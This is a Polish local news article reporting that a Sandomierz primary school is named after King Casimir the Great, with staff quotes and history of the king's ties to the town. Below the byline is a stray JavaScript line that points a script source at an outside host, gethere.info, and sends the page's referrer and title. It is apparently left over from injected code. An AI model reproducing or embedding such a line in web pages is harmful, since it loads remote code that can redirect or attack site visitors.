W Sandomierzu

Król Kazimierz Wielki patronem „Dwójki”

Król Kazimierz Wielki patronem „Dwójki”

Imię Króla Kazimierza Wielkiego nadano Szkole Podstawowej Nr 2 w Sandomierzu. Radni jednogłośnie podjęli taką decyzję podczas ostatniej sesji Rady Miasta. O nadanie szkole patrona wnioskowała Rada Pedagogiczna, Rada Rodziców i Samorząd Uczniowski.

img_7416-kopiowanie

Nadanie szkole imienia Króla Kazimierza Wielkiego jest uhonorowaniem 90 – lecia funkcjonowania placówki. Działania edukacyjne i wychowawcze związane z tym wydarzeniem są traktowane przez Radę Pedagogiczną i dyrekcję jako proces wspierający pracę szkoły w kształtowaniu postaw patriotycznych i obywatelskich uczniów. Celem jest również wzbogacenie szkolnej tradycji.

-Najpierw w poszczególnych klasach odbywały się lekcje wychowawcze i rozmowy na temat patrona i jego roli w życiu szkoły. Później nauczyciele przeprowadzili głosownie, w wyniku którego wyłoniono postać Króla Kazimierza Wielkiego. Następnie młodzież zapoznała się z historią przyszłego patrona szkoły. Na pewno konieczne będzie wprowadzenie drobnych zmian do programu wychowawczego i edukacyjnego naszej szkoły. Wiąże się to z autorytetem , którym jest Kazimierz Wielki. Uczniowie poznają bliżej postać swojego patrona – powiedziała Beata Audycka, bibliotekarka.

Proces związany z nadaniem imienia placówce nie był łatwy. W pracach przygotowawczych brali udział wszyscy nauczyciele, uczniowie, a także rodzice. Starania trwały od września. Wspólny wniosek został złożony do Urzędu Miejskiego 5 października. Król Kazimierz Wielki będzie patronem szkoły jednak data oficjalnego nadania „Dwójce” jego imienia nie jest jeszcze znana. Prawdopodobnie uroczystość odbędzie się w czerwcu lub we wrześniu, podczas rozpoczęcia nowego roku szkolnego 2017/2018. Wszystko zależy od decyzji burmistrza i Rady Miasta oraz funduszy jakie szkoła otrzyma od miasta. „Dwójka” zyska nową pieczęć szkolną, tablice urzędowe oraz sztandar.

img_7421-kopiowanie

-Postać patrona szkoły, tak ważna w dziejach Sandomierza, stanie się wzorem osobowym pozwalającym na wzmocnienie wspólnej tożsamości- poinformowała Elżbieta Sobolewska, Dyrektor Szkoły Podstawowej nr 2 w Sandomierzu .

Król Kazimierz Wielki był związany z Sandomierzem i ziemią sandomierską. To z jego inicjatywy wzniesiono m.in. mury obronne, bramy: Opatowską, Zawichojską, Lubelską i Krakowską, Zamek Królewski, spichlerz i Bazylikę Katedralną. Król odwiedził miasto aż 18 razy, jak podają historycy spędził tu łącznie około 25 miesięcy. Udzielał mieszkańcom wielu przywilejów, np. związanych z handlem. Sandomierska Gmina Żydowska była największą w Małopolsce. Podobnie jak krakowski Kazimierz, otrzymała od Kazimierza Wielkiego przywilej opieki królewskiej. Król ostatni raz był w Sandomierzu tuż przed śmiercią w październiku 1370 roku.

Kinga Kędziora Palińska

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

W Sandomierzu

Więcej w W Sandomierzu

Bezpieczeństwo podczas nadchodzącego weekendu

tsa24.com29 października 2021

Szarpanie za mundur i obelgi nie pomogły

tsa24.com29 października 2021

Kursy komunikacji miejskiej 1 listopada

tsa24.com29 października 2021

Wszystkich Świętych – Zmiana organizacji ruchu

tsa24.com29 października 2021

Budowa drogi dojazdowej do gruntów rolnych w Sandomierzu

tsa24.com27 października 2021

Konkurs na „Najlepszy Produkt Turystyczny” – Głosuj na Sandomierz

tsa24.com27 października 2021

Zbiórka nakrętek dla małej Igi

tsa24.com26 października 2021

Bartuś z Sandomierza świętował pierwsze urodziny

tsa24.com25 października 2021

Wręczono Nagrody Burmistrza Miasta Sandomierza im. A. Patkowskiego „Bonum Publicum”

tsa24.com25 października 2021